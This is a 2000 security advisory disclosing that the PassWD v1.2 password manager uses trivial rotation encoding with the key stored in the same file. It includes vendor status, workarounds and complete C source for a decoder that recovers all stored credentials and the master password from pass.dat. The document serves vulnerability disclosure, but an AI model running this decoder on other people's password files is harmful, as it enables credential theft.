OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Insecure encryption in PassWD v1.2
From: Daniel Roethlisberger (adminROE.CH)
Date: Sat Jun 03 2000 - 22:07:22 CDT


==[ Roe's Security Advisory # 1 (yeeha!) ]=======================

 Software affected: PassWD v1.2
 Issue type: Very weak encryption (`Snake Oil')
 Operating Systems: Windows 9x, NT and 2000
 Product Web Site: http://web.tiscalinet.it/gbigarelli/
 Advisory release date: 4th June 2000
 Advisory author: Daniel Roethlisberger <adminroe.ch>

--[ Description ]------------------------------------------------

 PassWD is a password managment software designed to store all
 the users user and password combinations along with a site
 URL. Due to the fact that PassWD is being spread by well-known
 free/shareware distro sites such as tucows.com, the community
 should be aware that it is very insecure.

 The documentation claims that PassWD employs encryption. In
 fact it uses a very weak coding that can easily be decoded.

 If an attacker can get hold of the password file (usually this
 will be pass.dat in PassWD's directory, which can be found in
 the Registry), he can easily decode the file and thus retrieve
 the user/password combinations along with the matching links,
 and the master password used to `protect' the password list.

 Also this is very easily exploitable by malware like password
 gathering trojans.

--[ Vendor Status ]----------------------------------------------

 The author of PassWD is informed. He is informing registered
 users of PassWD and any distribution sites offering
 PassWD v1.2 for download.

 The author is not developing PassWD v1.2 anymore.
 There will be no patch or update available.

 Instead there is a successing product called PassWD 2000,
 which will be released shortly. The author claims that it
 will employ a better (real) encryption algorithm.

--[ Solution ]---------------------------------------------------

 There's no real solution <sigh>.

 One possible workaround is to install PassWD on an encrypted
 hard disk (eg. using PGPdisk or ScramDisk).

 Another is to wait for the successing product `PassWD 2000',
 which should be available shortly from the developers web site
 at http://web.tiscalinet.it/gbigarelli/ , which is where there
 is a beta version available already. Personally, I'd be wary
 of the beta version specifically and of PassWD 2000 in
 general, which I think is prudent unless source code review
 can verify that the product is as secure as it should be.

 After changing to a more secure solution, users of PassWD v1.2
 will need to securely wipe their old pass.dat file (eg. using
 the secure wipe functions of PGP).

--[ Details ]----------------------------------------------------

 PassWD stores all the sensitive data in a file usually called
 pass.dat (this can be changed in PassWD's INI file).
 Unfortunately, it not only employs a very weak encoding
 algorithm, but it also hides the key in the same file.
 This key is purely random, and is in no way dependant on the
 master password.

 The key can take a value between 1 and 99, which shows the
 extreme weakness of the system. The charset consisting of 99
 characters is simply rotated by <key> positions.

 The below source code illustrates this. It can be used to
 decode any given PassWD v1.2 `pass.dat' file to either stdout
 or an output file.

--[ Exploit Source ]---------------------------------------------

/*
 * Decoder for PassWD v1.2 `pass.dat' password files
 *
 * Written 2000 by Daniel Roethlisberger <adminroe.ch>
 *
 * This code is hereby placed in the public domain.
 * Use this code at your own risk for whatever you want.
 *
 * The decoded data is not parsed in any way - it should
 * be very easy to moderately experienced programmers
 * to add that themselves.
 *
 */

#include <stdio.h>

void main(int argc, char *argv[])
{
   unsigned char charpos;
   FILE* outfile;
   FILE* infile;
   unsigned char a;
   unsigned char b;
   unsigned char key;
   unsigned char x;

   unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <adminroe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
      return;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         _fcloseall();
         return;
      }
   }

   getc(infile); /* jump over decoy byte */
   a = getc(infile); /* read encoded key byte 1 */
   b = getc(infile); /* read encoded key byte 2 */

   if(b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      return;
   }

   /* this line `decodes' the key */
   key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(!feof(infile))
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("\nERROR - encountered illegal character in source file\n");
            _fcloseall();
            return;
         }
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   _fcloseall();
   return;
}

--[ Credits/Disclaimer ]-----------------------------------------

 There was no reverse engineering involved in analysing this
 vulnerability, therefore this security advisory constitutes no
 violation of the user license agreement.

 Permission is hereby granted to copy or redistribute this
 advisory, but only in its entirety.

 Copyright (C) 2000 by Daniel Roethlisberger <adminroe.ch>.

 Cheers,
 Dan

--
   Daniel Roethlisberger  o  encrypted email strongly recommended
   adminroe.ch  o  www.roe.ch  o  ICQ 4646931  o  PGP 0x8DE543ED